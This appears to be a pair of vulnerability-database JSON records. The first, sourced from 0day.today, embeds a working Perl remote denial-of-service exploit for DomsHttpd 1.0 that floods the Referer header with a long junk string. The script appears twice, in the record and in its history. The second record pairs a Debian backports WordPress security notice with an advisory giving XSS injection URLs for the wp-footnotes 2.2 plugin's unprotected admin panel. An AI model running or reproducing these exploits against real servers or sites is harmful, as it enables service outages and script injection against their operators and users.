{"hash": "51b7db16fbc66c6bd717198e6220d7c7d618bca982606045e02d02a1ea521f78", "id": "1337DAY-ID-18998", "lastseen": "2018-01-09T21:19:18", "viewCount": 1, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "b0d3d3a91f21189719037cf41ad6dbfa", "key": "description"}, {"hash": "06a414e23f4f5ac5c728ab93803f2b71", "key": "href"}, {"hash": "665633b7771cb538f31a1452b11184a9", "key": "modified"}, {"hash": "665633b7771cb538f31a1452b11184a9", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "9a74e0973947f543c2233458d50da951", "key": "reporter"}, {"hash": "7eb138f064b3c19441efff5c02b5992f", "key": "sourceData"}, {"hash": "499316ee93f918547a033c28d2b4138b", "key": "sourceHref"}, {"hash": "8a2b93eb6c93478f859d3031b0e255b6", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [], "modified": "2018-01-09T21:19:18"}, "vulnersScore": 5.0}, "type": "zdt", "sourceHref": "https://0day.today/exploit/18998", "description": "Exploit for windows platform in category dos / poc", "title": "DomsHttpd 1.0 <= Remote Denial Of Service Exploit", "history": [{"bulletin": {"hash": "e82f8e745acdd56f22be84cca4ab2f5defa5feeb69560fe14896d40c51c7a0c6", "id": "1337DAY-ID-18998", "lastseen": "2016-04-20T02:01:56", "enchantments": {"score": {"value": 5.7, "modified": "2016-04-20T02:01:56"}}, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "660feed9f8983f8de29e38aaad468690", "key": "sourceData"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "665633b7771cb538f31a1452b11184a9", "key": "published"}, {"hash": "8a2b93eb6c93478f859d3031b0e255b6", "key": "title"}, {"hash": "9a74e0973947f543c2233458d50da951", "key": "reporter"}, {"hash": "b0d3d3a91f21189719037cf41ad6dbfa", "key": "description"}, {"hash": "665633b7771cb538f31a1452b11184a9", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "27754cbbafff42f9b8ad7691c3217c61", "key": "href"}, {"hash": "9c2faae71cb21b8f19c76ae594cc09e3", "key": "sourceHref"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/18998", "description": "Exploit for windows platform in category dos / poc", "viewCount": 0, "title": "DomsHttpd 1.0 <= Remote Denial Of Service Exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "#!/usr/bin/perl\r\n \r\n# DomsHttpd 1.0 <= Remote Denial Of Service Exploit\r\n \r\n# Credit: Jean Pascal Pereira <pereira@secbiz.de>\r\n \r\n# Usage: domshttpd.pl [host] [port]\r\n \r\nuse strict;\r\nuse warnings;\r\nuse IO::Socket;\r\n \r\nmy $host = shift || \"localhost\";\r\nmy $port = shift || 88;\r\n \r\nmy $sock = IO::Socket::INET->new( Proto => \"tcp\",\r\n PeerAddr => $host,\r\n PeerPort => $port\r\n);\r\n \r\n \r\nmy $junk = \"A\"x3047;\r\n \r\nprint $sock \"POST / HTTP/1.1\\r\\nHost: \".$host.\"\\r\\nConnection: close\\r\\nUser-Agent: Mozilla\\r\\nReferer: http://\".$host.\"/\".$junk.\"\\r\\n\\r\\n\";\r\n \r\nsleep 4;\r\n \r\nclose($sock);\r\n\r\n\n\n# 0day.today [2016-04-20] #", "published": "2012-07-16T00:00:00", "references": [], "reporter": "Jean Pascal Pereira", "modified": "2012-07-16T00:00:00", "href": "http://0day.today/exploit/description/18998"}, "lastseen": "2016-04-20T02:01:56", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "#!/usr/bin/perl\r\n \r\n# DomsHttpd 1.0 <= Remote Denial Of Service Exploit\r\n \r\n# Credit: Jean Pascal Pereira <[email\u00a0protected]>\r\n \r\n# Usage: domshttpd.pl [host] [port]\r\n \r\nuse strict;\r\nuse warnings;\r\nuse IO::Socket;\r\n \r\nmy $host = shift || \"localhost\";\r\nmy $port = shift || 88;\r\n \r\nmy $sock = IO::Socket::INET->new( Proto => \"tcp\",\r\n PeerAddr => $host,\r\n PeerPort => $port\r\n);\r\n \r\n \r\nmy $junk = \"A\"x3047;\r\n \r\nprint $sock \"POST / HTTP/1.1\\r\\nHost: \".$host.\"\\r\\nConnection: close\\r\\nUser-Agent: Mozilla\\r\\nReferer: http://\".$host.\"/\".$junk.\"\\r\\n\\r\\n\";\r\n \r\nsleep 4;\r\n \r\nclose($sock);\r\n\r\n\n\n# 0day.today [2018-01-09] #", "published": "2012-07-16T00:00:00", "references": [], "reporter": "Jean Pascal Pereira", "modified": "2012-07-16T00:00:00", "href": "https://0day.today/exploit/description/18998"}

{"debian": [{"lastseen": "2018-10-16T22:14:44", "bulletinFamily": "unix", "description": "Matt Taggart uploaded new packages for wordpress which fixed the\nfollowing security problem:\n\nCritical core security bug in the HTML sanitation library\n more info: http://wp.me/pZhYe-qt\n\nFor the lenny-backports distribution the problems have been fixed in\nversion 3.0.4+dfsg-1~bpo50+1.\n\nUpgrade instructions\n--------------------\n\nIf you don&#x27;t use pinning (see [1]) you have to update the package\nmanually via &quot;apt-get -t lenny-backports install &lt;packagelist&gt;&quot; with\nthe packagelist of your installed packages affected by this update.\n[1] &lt;http://backports.debian.org/Instructions&gt;\n\nWe recommend to pin (in /etc/apt/preferences) the backports repository to\n200 so that new versions of installed backports will be installed\nautomatically. \n\n Package: *\n Pin: release a=lenny-backports\n Pin-Priority: 200\n\n\n\n", "modified": "2011-01-06T16:39:39", "published": "2011-01-06T16:39:39", "id": "DEBIAN:BSA-015:8A1C1", "href": "https://lists.debian.org/debian-backports-announce/2011/debian-backports-announce-201101/msg00001.html", "title": "[BSA-015] Security Update for wordpress", "type": "debian", "cvss": {"score": 0.0, "vector": "NONE"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:24", "bulletinFamily": "software", "description": "################################################################\r\nWordpress Plugin wp-footnotes 2.2 admin_panel.php Multiple Vulnerabilities\r\nFounded: 1st, February 2008 Founder: NBBN\r\n################################################################\r\n\r\n1&#41; No Access Control.\r\n\r\nAn attacker can access the adminpanel of the footnotes. \r\n\r\nhttp://site.tld/wordpress/wp-content/plugins/wp-footnotes/admin_panel.php\r\n\r\nThe result -&gt; Many XSS Vulnerabilities. because no defines of variables. And \r\nhe can add his own code on the blog footer.\r\n\r\n\r\n2&#41; Multiple XSS Vuln&#39;s &#40;Register Globals: ON&#41;\r\n\r\nhttp://site.tld/wordpress/wp-content/plugins/wp-footnotes/admin_panel.php?wp_footnotes_current_settings[priority]=&quot;&gt;&lt;script&gt;alert&#40;&quot;XSS&quot;&#41;&lt;/script&gt;\r\n\r\nhttp://site.tld/wordpress/wp-content/plugins/wp-footnotes/admin_panel.php?wp_footnotes_current_settings[style_rules]=&lt;/textarea&gt;&lt;script&gt;alert&#40;&quot;XSS&quot;&#41;&lt;/script&gt;\r\n\r\nhttp://site.tld/wordpress/wp-content/plugins/admin_panel.php?wp_footnotes_current_settings[pre_footnotes]=&lt;/textarea&gt;&lt;script&gt;alert&#40;&quot;XSS&quot;&#41;&lt;/script&gt;\r\n\r\nhttp://site.tld/wordpress/wp-content/plugins/admin_panel.php?wp_footnotes_current_settings[post_footnotes]=&lt;/textarea&gt;&lt;script&gt;alert&#40;&quot;:-&#40;&quot;&#41;", "modified": "2008-02-03T00:00:00", "published": "2008-02-03T00:00:00", "id": "SECURITYVULNS:DOC:18998", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:18998", "title": "Wordpress Pluging wp-footnotes 2.2 &#40;admin_panel.php&#41; Multiple Vulnerabilites", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}